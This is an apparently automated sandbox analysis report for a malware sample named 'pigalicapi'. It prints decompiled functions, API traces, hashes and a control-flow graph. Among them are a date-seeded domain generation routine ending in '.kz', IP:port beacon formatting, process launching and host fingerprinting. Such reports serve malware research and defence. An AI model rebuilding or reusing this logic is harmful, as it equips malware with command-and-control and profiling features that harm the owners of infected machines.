                                                                                                                                                                                                                                                                            0x00c7aa3f
                                                                                                                                                                                                                                                                            0x00c7aa3f
                                                                                                                                                                                                                                                                            0x00c7aa45
                                                                                                                                                                                                                                                                            0x00c7aa47
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00c7aa48
                                                                                                                                                                                                                                                                            0x00c7aa0f
                                                                                                                                                                                                                                                                            0x00c7aa18
                                                                                                                                                                                                                                                                            0x00c7aa27
                                                                                                                                                                                                                                                                            0x00c7aa1a
                                                                                                                                                                                                                                                                            0x00c7aa1d
                                                                                                                                                                                                                                                                            0x00c7aa23
                                                                                                                                                                                                                                                                            0x00c7aa23
                                                                                                                                                                                                                                                                            0x00c7aa2b
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00c7aa2d
                                                                                                                                                                                                                                                                            0x00c7aa30
                                                                                                                                                                                                                                                                            0x00c7aa32
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00c7aa32
                                                                                                                                                                                                                                                                            0x00c7aa2b
                                                                                                                                                                                                                                                                            0x00c7a9e7
                                                                                                                                                                                                                                                                            0x00c7a9ec
                                                                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00000000,00000000,?,00C7A978,?,00000000,00000000,00000000,?,00C7AB75,00000006,FlsSetValue), ref: 00C7AA03
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,00C7A978,?,00000000,00000000,00000000,?,00C7AB75,00000006,FlsSetValue,00CC7FD0,FlsSetValue,00000000,00000364,?,00C79F22), ref: 00C7AA0F
                                                                                                                                                                                                                                                                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00C7A978,?,00000000,00000000,00000000,?,00C7AB75,00000006,FlsSetValue,00CC7FD0,FlsSetValue,00000000), ref: 00C7AA1D
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.811794730.0000000000C71000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C70000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.811747831.0000000000C70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.811875964.0000000000C8A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.812414924.0000000000CCC000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.813021659.0000000000D0D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.813081378.0000000000D0F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_c70000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 3177248105-0
                                                                                                                                                                                                                                                                            • Opcode ID: 0374af94965cbfce8061401505272e7bdc6df55bf6ecac95f75dec2446eb6a19
                                                                                                                                                                                                                                                                            • Instruction ID: 61c5f86b90b10daea865f3b3121516258f07f5ee53eb09624bc67333d7c567d9
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0374af94965cbfce8061401505272e7bdc6df55bf6ecac95f75dec2446eb6a19
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D401D432211222AFC7218A69AD44F6E7B98EF84BB1B118621F91FD7140D720DD10DFE2
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • ___BuildCatchObject.LIBVCRUNTIME ref: 00C7FABA
                                                                                                                                                                                                                                                                              • Part of subcall function 00C800FF: ___AdjustPointer.LIBCMT ref: 00C80149
                                                                                                                                                                                                                                                                            • _UnwindNestedFrames.LIBCMT ref: 00C7FAD1
                                                                                                                                                                                                                                                                            • ___FrameUnwindToState.LIBVCRUNTIME ref: 00C7FAE3
                                                                                                                                                                                                                                                                            • CallCatchBlock.LIBVCRUNTIME ref: 00C7FB07
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.811794730.0000000000C71000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C70000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.811747831.0000000000C70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.811875964.0000000000C8A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.812414924.0000000000CCC000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.813021659.0000000000D0D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.813081378.0000000000D0F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_c70000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 2633735394-0
                                                                                                                                                                                                                                                                            • Opcode ID: a0c907a298b97105730ea91cdf1af8e9e208b30165c122e71212370a16017045
                                                                                                                                                                                                                                                                            • Instruction ID: e1e549c2378892db1a832ade837964c7a536c0fd8309106507e1be3606bdda0c
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a0c907a298b97105730ea91cdf1af8e9e208b30165c122e71212370a16017045
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C501E532000109BBCF12AF55CD41EDA3BBAFF48764F158029F91C66121D372E962EBA4
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                                                            			E00C7F596() {
                                                                                                                                                                                                                                                                            				void* _t4;
                                                                                                                                                                                                                                                                            				void* _t8;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				E00C809E7();
                                                                                                                                                                                                                                                                            				E00C8097B();
                                                                                                                                                                                                                                                                            				if(E00C806BE() != 0) {
                                                                                                                                                                                                                                                                            					_t4 = E00C7F6D6(_t8, __eflags);
                                                                                                                                                                                                                                                                            					__eflags = _t4;
                                                                                                                                                                                                                                                                            					if(_t4 != 0) {
                                                                                                                                                                                                                                                                            						return 1;
                                                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                                                            						E00C806FA();
                                                                                                                                                                                                                                                                            						goto L1;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                                                            					L1:
                                                                                                                                                                                                                                                                            					return 0;
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            			}





                                                                                                                                                                                                                                                                            0x00c7f596
                                                                                                                                                                                                                                                                            0x00c7f59b
                                                                                                                                                                                                                                                                            0x00c7f5a7
                                                                                                                                                                                                                                                                            0x00c7f5ac
                                                                                                                                                                                                                                                                            0x00c7f5b1
                                                                                                                                                                                                                                                                            0x00c7f5b3
                                                                                                                                                                                                                                                                            0x00c7f5be
                                                                                                                                                                                                                                                                            0x00c7f5b5
                                                                                                                                                                                                                                                                            0x00c7f5b5
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00c7f5b5
                                                                                                                                                                                                                                                                            0x00c7f5a9
                                                                                                                                                                                                                                                                            0x00c7f5a9
                                                                                                                                                                                                                                                                            0x00c7f5ab
                                                                                                                                                                                                                                                                            0x00c7f5ab

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00C7F596
                                                                                                                                                                                                                                                                            • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 00C7F59B
                                                                                                                                                                                                                                                                            • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 00C7F5A0
                                                                                                                                                                                                                                                                              • Part of subcall function 00C806BE: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 00C806CF
                                                                                                                                                                                                                                                                            • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00C7F5B5
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.811794730.0000000000C71000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C70000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.811747831.0000000000C70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.811875964.0000000000C8A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.812414924.0000000000CCC000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.813021659.0000000000D0D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.813081378.0000000000D0F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_c70000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1761009282-0
                                                                                                                                                                                                                                                                            • Opcode ID: d9d358f762020a3697c42513d329f3b7714901d0df1c8398228c41b5068d958c
                                                                                                                                                                                                                                                                            • Instruction ID: 18a77ad7b584a13d77774840a2704a6b5194e7ae87b182cbe30046324a73ad7a
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d9d358f762020a3697c42513d329f3b7714901d0df1c8398228c41b5068d958c
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 26C04C55154210942DD03EB261972AD17003CE37CDFA090E9FC5957103AD46492F773F
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                                                            			E011792E0(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                                                            				signed int _v12;
                                                                                                                                                                                                                                                                            				struct _SYSTEMTIME _v28;
                                                                                                                                                                                                                                                                            				signed int _v32;
                                                                                                                                                                                                                                                                            				intOrPtr _v36;
                                                                                                                                                                                                                                                                            				intOrPtr _v40;
                                                                                                                                                                                                                                                                            				char _v172;
                                                                                                                                                                                                                                                                            				void* _t46;
                                                                                                                                                                                                                                                                            				intOrPtr _t50;
                                                                                                                                                                                                                                                                            				void* _t83;
                                                                                                                                                                                                                                                                            				void* _t84;
                                                                                                                                                                                                                                                                            				void* _t86;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				_v8 = 0;
                                                                                                                                                                                                                                                                            				if(_a4 != 0 && _a8 != 0) {
                                                                                                                                                                                                                                                                            					GetLocalTime( &_v28);
                                                                                                                                                                                                                                                                            					_t46 = E011797E0(_v28.wMonth & 0x0000ffff, _v28.wYear & 0x0000ffff, _v28.wMonth & 0x0000ffff, _v28.wDay & 0x0000ffff);
                                                                                                                                                                                                                                                                            					_t84 = _t83 + 0xc;
                                                                                                                                                                                                                                                                            					_v12 = _t46 + _a12;
                                                                                                                                                                                                                                                                            					_v32 = 0;
                                                                                                                                                                                                                                                                            					while(_v32 < _a8) {
                                                                                                                                                                                                                                                                            						E01177D20( &_v172,  &_v172, 0, 0x80);
                                                                                                                                                                                                                                                                            						_t50 = E01178BB0( &_v12, 4,  &_v172, 0x80);
                                                                                                                                                                                                                                                                            						_t86 = _t84 + 0x1c;
                                                                                                                                                                                                                                                                            						_v40 = _t50;
                                                                                                                                                                                                                                                                            						if(_v40 <= 0) {
                                                                                                                                                                                                                                                                            							_v12 = _v32 * 7 + _v12;
                                                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                                                            							_v12 = _v172;
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						_v36 = _v12 % 4 + 9;
                                                                                                                                                                                                                                                                            						E01179650( &_v172, _v40, _v32 * 0x28 + _a4, _v36);
                                                                                                                                                                                                                                                                            						_t84 = _t86 + 0x10;
                                                                                                                                                                                                                                                                            						lstrcatA(_v32 * 0x28 + _a4, ".kz");
                                                                                                                                                                                                                                                                            						_v12 = _v12 + 1;
                                                                                                                                                                                                                                                                            						_v8 = _v8 + 1;
                                                                                                                                                                                                                                                                            						_v32 = _v32 + 1;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				return _v8;
                                                                                                                                                                                                                                                                            			}















                                                                                                                                                                                                                                                                            0x011792e9
                                                                                                                                                                                                                                                                            0x011792f4
                                                                                                                                                                                                                                                                            0x01179308
                                                                                                                                                                                                                                                                            0x0117931d
                                                                                                                                                                                                                                                                            0x01179322
                                                                                                                                                                                                                                                                            0x01179328
                                                                                                                                                                                                                                                                            0x0117932b
                                                                                                                                                                                                                                                                            0x0117933d
                                                                                                                                                                                                                                                                            0x01179357
                                                                                                                                                                                                                                                                            0x01179371
                                                                                                                                                                                                                                                                            0x01179376
                                                                                                                                                                                                                                                                            0x01179379
                                                                                                                                                                                                                                                                            0x01179380
                                                                                                                                                                                                                                                                            0x01179396
                                                                                                                                                                                                                                                                            0x01179382
                                                                                                                                                                                                                                                                            0x01179388
                                                                                                                                                                                                                                                                            0x01179388
                                                                                                                                                                                                                                                                            0x011793a8
                                                                                                                                                                                                                                                                            0x011793c4
                                                                                                                                                                                                                                                                            0x011793c9
                                                                                                                                                                                                                                                                            0x011793db
                                                                                                                                                                                                                                                                            0x011793e7
                                                                                                                                                                                                                                                                            0x011793f0
                                                                                                                                                                                                                                                                            0x0117933a
                                                                                                                                                                                                                                                                            0x0117933a
                                                                                                                                                                                                                                                                            0x0117933d
                                                                                                                                                                                                                                                                            0x011793fe

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetLocalTime.KERNEL32(?), ref: 01179308
                                                                                                                                                                                                                                                                              • Part of subcall function 01178BB0: CryptAcquireContextA.ADVAPI32(00000000,0117C6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000), ref: 01178BFF
                                                                                                                                                                                                                                                                              • Part of subcall function 01178BB0: GetLastError.KERNEL32 ref: 01178C09
                                                                                                                                                                                                                                                                              • Part of subcall function 01178BB0: CryptAcquireContextA.ADVAPI32(00000000,0117C6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008), ref: 01178C38
                                                                                                                                                                                                                                                                              • Part of subcall function 01178BB0: CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 01178C59
                                                                                                                                                                                                                                                                              • Part of subcall function 01178BB0: CryptHashData.ADVAPI32(00000000,00000000,00000000,00000000), ref: 01178C71
                                                                                                                                                                                                                                                                              • Part of subcall function 01178BB0: CryptGetHashParam.ADVAPI32(00000000,00000004,00000000,00000004,00000000), ref: 01178C99
                                                                                                                                                                                                                                                                              • Part of subcall function 01178BB0: CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,?,00000000), ref: 01178CC1
                                                                                                                                                                                                                                                                              • Part of subcall function 01178BB0: CryptDestroyHash.ADVAPI32(00000000), ref: 01178CD5
                                                                                                                                                                                                                                                                              • Part of subcall function 01178BB0: CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 01178CE1
                                                                                                                                                                                                                                                                            • lstrcatA.KERNEL32(00000000,.kz), ref: 011793DB
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.813345942.0000000001170000.00000040.00001000.00020000.00000000.sdmp, Offset: 01170000, based on PE: true
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_1170000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Crypt$Hash$Context$AcquireParam$CreateDataDestroyErrorLastLocalReleaseTimelstrcat
                                                                                                                                                                                                                                                                            • String ID: .kz
                                                                                                                                                                                                                                                                            • API String ID: 2740484991-4216035510
                                                                                                                                                                                                                                                                            • Opcode ID: cd55000ba6569beaf0b5b0a1abfe5dbaed07aee867599f584a695d01b4b5c067
                                                                                                                                                                                                                                                                            • Instruction ID: ee186e6671262cca2b82ce7c24c0675340a4bde5493d7a253891bd749c3147af
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: cd55000ba6569beaf0b5b0a1abfe5dbaed07aee867599f584a695d01b4b5c067
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5B312FB1D0420DEBDF08DF94C885BEEBBB5EF58314F108059E555A7380E7389A89CB91
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            C-Code - Quality: 90%
                                                                                                                                                                                                                                                                            			E011778D0(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                                                                                                                                                                                                            				char _v5;
                                                                                                                                                                                                                                                                            				char _v12;
                                                                                                                                                                                                                                                                            				signed int _v16;
                                                                                                                                                                                                                                                                            				intOrPtr _v20;
                                                                                                                                                                                                                                                                            				intOrPtr _t31;
                                                                                                                                                                                                                                                                            				void* _t46;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				_v5 = 0;
                                                                                                                                                                                                                                                                            				if(_a4 != 0 && _a8 > 0 && _a12 != 0 && _a16 >= _a8) {
                                                                                                                                                                                                                                                                            					_v16 = 0;
                                                                                                                                                                                                                                                                            					while(_v16 < _a8) {
                                                                                                                                                                                                                                                                            						_t31 = E01177B70( &_v12, _v16 * 6 + _a4, 4);
                                                                                                                                                                                                                                                                            						_push(_v12);
                                                                                                                                                                                                                                                                            						L0117B1EC();
                                                                                                                                                                                                                                                                            						_v20 = _t31;
                                                                                                                                                                                                                                                                            						wnsprintfA(_v16 * 0x28 + _a12, 0x28, "%s:%u", _v20,  *(_a4 + 4 + _v16 * 6) & 0x0000ffff);
                                                                                                                                                                                                                                                                            						_t46 = _t46 + 0x20;
                                                                                                                                                                                                                                                                            						_v16 = _v16 + 1;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					_v5 = 1;
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				return _v5;
                                                                                                                                                                                                                                                                            			}









                                                                                                                                                                                                                                                                            0x011778d6
                                                                                                                                                                                                                                                                            0x011778de
                                                                                                                                                                                                                                                                            0x011778f8
                                                                                                                                                                                                                                                                            0x0117790a
                                                                                                                                                                                                                                                                            0x01177922
                                                                                                                                                                                                                                                                            0x0117792d
                                                                                                                                                                                                                                                                            0x0117792e
                                                                                                                                                                                                                                                                            0x01177933
                                                                                                                                                                                                                                                                            0x0117795a
                                                                                                                                                                                                                                                                            0x01177960
                                                                                                                                                                                                                                                                            0x01177907
                                                                                                                                                                                                                                                                            0x01177907
                                                                                                                                                                                                                                                                            0x01177965
                                                                                                                                                                                                                                                                            0x01177965
                                                                                                                                                                                                                                                                            0x0117796f

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.813345942.0000000001170000.00000040.00001000.00020000.00000000.sdmp, Offset: 01170000, based on PE: true
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_1170000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: inet_ntoawnsprintf
                                                                                                                                                                                                                                                                            • String ID: %s:%u
                                                                                                                                                                                                                                                                            • API String ID: 890441721-1474915593
                                                                                                                                                                                                                                                                            • Opcode ID: 4d007933b79ac0b1a0bbd2fe38c00beca7c3e4867b2a37988953fe6d07601cfb
                                                                                                                                                                                                                                                                            • Instruction ID: b27ad8025d89753112a84d3ac950f86825db4adcbc315b9640ae1a1f2b161b8c
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4d007933b79ac0b1a0bbd2fe38c00beca7c3e4867b2a37988953fe6d07601cfb
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0A118E71904209EBDB08CF98D988BFDBBB4EB10318F04819DE915AB380E335E645CB91
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                                                            			E01171E60(CHAR* _a4) {
                                                                                                                                                                                                                                                                            				void* _v8;
                                                                                                                                                                                                                                                                            				struct _PROCESS_INFORMATION _v24;
                                                                                                                                                                                                                                                                            				struct _STARTUPINFOA _v100;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				_v8 = 0;
                                                                                                                                                                                                                                                                            				if(_a4 != 0) {
                                                                                                                                                                                                                                                                            					E01177D20(E01177D20( &_v24,  &_v24, 0, 0x10),  &_v100, 0, 0x44);
                                                                                                                                                                                                                                                                            					_v100.cb = 0x44;
                                                                                                                                                                                                                                                                            					if(CreateProcessA(0, _a4, 0, 0, 0, 0, 0, 0,  &_v100,  &_v24) != 0) {
                                                                                                                                                                                                                                                                            						CloseHandle(_v24.hThread);
                                                                                                                                                                                                                                                                            						_v8 = _v24.hProcess;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				return _v8;
                                                                                                                                                                                                                                                                            			}






                                                                                                                                                                                                                                                                            0x01171e66
                                                                                                                                                                                                                                                                            0x01171e71
                                                                                                                                                                                                                                                                            0x01171e8b
                                                                                                                                                                                                                                                                            0x01171e93
                                                                                                                                                                                                                                                                            0x01171ebc
                                                                                                                                                                                                                                                                            0x01171ec2
                                                                                                                                                                                                                                                                            0x01171ecb
                                                                                                                                                                                                                                                                            0x01171ecb
                                                                                                                                                                                                                                                                            0x01171ebc
                                                                                                                                                                                                                                                                            0x01171ed4

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 01171EB4
                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 01171EC2
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.813345942.0000000001170000.00000040.00001000.00020000.00000000.sdmp, Offset: 01170000, based on PE: true
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_1170000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CloseCreateHandleProcess
                                                                                                                                                                                                                                                                            • String ID: D
                                                                                                                                                                                                                                                                            • API String ID: 3712363035-2746444292
                                                                                                                                                                                                                                                                            • Opcode ID: 899f5ada6e24ca2390896bbd62e9a8c35408903205ee86bb62d55145606eeb0a
                                                                                                                                                                                                                                                                            • Instruction ID: 9798d6871ccaa1e42e3b7f3133a8cb386509463e1b8316aaca976428d85e652f
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 899f5ada6e24ca2390896bbd62e9a8c35408903205ee86bb62d55145606eeb0a
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D2016DB5A0030DBBEB14DF94CC49FEE77B9AB04704F044518EA08AB2C0E7709A44CBA1
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                            control_flow_graph 0 7b4ba0-7b4bbc CoInitialize 1 7b4bc2-7b4bff call 7b7b70 SetEvent 0->1 2 7b56f0-7b56fc CoUninitialize 0->2 1->2 6 7b4c05-7b4c0e 1->6 7 7b4c28-7b4c84 VirtualAlloc * 3 6->7 8 7b4c10-7b4c21 WaitForSingleObject 6->8 10 7b56eb 7->10 11 7b4c8a-7b4c8e 7->11 8->7 9 7b4c23 8->9 9->2 10->2 11->10 12 7b4c94-7b4c98 11->12 12->10 13 7b4c9e-7b4cbd 12->13 15 7b4cc3-7b4cd0 13->15 16 7b52a2-7b52b2 13->16 19 7b529d 15->19 20 7b4cd6-7b4ce3 15->20 17 7b5325-7b534e call 7b8370 16->17 18 7b52b4-7b52be 16->18 30 7b56b8-7b56e5 VirtualFree * 3 17->30 31 7b5354-7b537f lstrlenA * 2 17->31 18->17 21 7b52c0-7b52d1 18->21 22 7b4d1c-7b4d29 20->22 23 7b4ce5-7b4d17 call 7b6170 * 2 call 7b60c0 20->23 21->17 27 7b52d3-7b52dd 21->27 25 7b4d2b-7b4d5d call 7b6170 * 2 call 7b60c0 22->25 26 7b4d62-7b4d6f 22->26 23->19 25->19 34 7b4da8-7b4db5 26->34 35 7b4d71-7b4da3 call 7b6170 * 2 call 7b60c0 26->35 27->17 33 7b52df-7b5322 call 7b7b70 27->33 30->10 31->30 37 7b5385-7b53ca wsprintfA CryptBinaryToStringA 31->37 33->17 38 7b4e2c-7b4e39 34->38 39 7b4db7-7b4dd8 GetCurrentThreadId call 7b6170 34->39 35->19 37->30 44 7b53d0-7b544e MultiByteToWideChar call 7b17d0 37->44 45 7b4e3b-7b4e6d call 7b6170 * 2 call 7b60c0 38->45 46 7b4e72-7b4e7f 38->46 66 7b4dda-7b4dfb call 7b6170 call 7b60c0 39->66 67 7b4dfd-7b4e04 39->67 71 7b569b-7b56a2 44->71 72 7b5454-7b545e 44->72 45->19 58 7b4ee1-7b4eee 46->58 59 7b4e81-7b4eb4 GetSystemMetrics * 2 call 7b6170 46->59 63 7b4f40-7b4f4d 58->63 64 7b4ef0-7b4f13 GlobalMemoryStatus call 7b6170 58->64 81 7b4eb9-7b4edc call 7b6170 call 7b60c0 59->81 77 7b4f4f-7b4f81 call 7b6170 * 2 call 7b60c0 63->77 78 7b4f86-7b4f93 63->78 89 7b4f18-7b4f3b call 7b6170 call 7b60c0 64->89 79 7b4e27 66->79 67->79 80 7b4e06-7b4e24 call 7b6170 call 7b60c0 67->80 71->30 84 7b56a4-7b56b2 VirtualFree 71->84 87 7b5470-7b5477 72->87 88 7b5460-7b546a 72->88 77->19 85 7b4fd0-7b4fdd 78->85 86 7b4f95-7b4fcb call 7b6170 * 2 call 7b60c0 78->86 79->19 80->79 81->19 84->30 102 7b4fdf-7b502d lstrlenA call 7b6170 * 2 call 7b60c0 85->102 103 7b5032-7b503f 85->103 86->19 97 7b551f-7b5526 87->97 98 7b547d-7b54af VirtualFree 87->98 88->87 88->97 89->19 97->71 108 7b552c-7b5540 EnterCriticalSection 97->108 112 7b54c0-7b54c7 98->112 102->19 109 7b5041-7b5091 lstrlenA call 7b6170 * 2 call 7b60c0 103->109 110 7b5096-7b50a3 103->110 120 7b558c-7b55c1 VirtualAlloc 108->120 121 7b5542-7b5573 VirtualAlloc call 7b7b70 108->121 109->19 126 7b50a5-7b50ff lstrlenA call 7b6170 * 2 call 7b60c0 110->126 127 7b5104-7b5111 110->127 112->97 125 7b54c9-7b54f5 call 7b17d0 112->125 134 7b568e-7b5695 LeaveCriticalSection 120->134 135 7b55c7-7b55d8 GetTickCount 120->135 143 7b5578-7b5587 121->143 151 7b54fa-7b550d 125->151 126->19 132 7b5113-7b516d lstrlenA call 7b6170 * 2 call 7b60c0 127->132 133 7b5172-7b517f 127->133 132->19 149 7b5181-7b51db lstrlenA call 7b6170 * 2 call 7b60c0 133->149 150 7b51e0-7b51ed 133->150 134->71 145 7b55da-7b561a call 7b7b70 * 2 135->145 146 7b561c-7b5659 call 7b7b70 * 2 135->146 143->134 192 7b565c-7b568b VirtualFree 145->192 146->192 149->19 155 7b523f-7b524c 150->155 156 7b51ef-7b523d lstrlenA call 7b6170 * 2 call 7b60c0 150->156 163 7b551b 151->163 164 7b550f-7b5519 151->164 155->19 171 7b524e-7b529a call 7b9b90 call 7b6170 * 2 call 7b60c0 155->171 156->19 163->97 164->163 174 7b551d 164->174 171->19 174->112 192->134
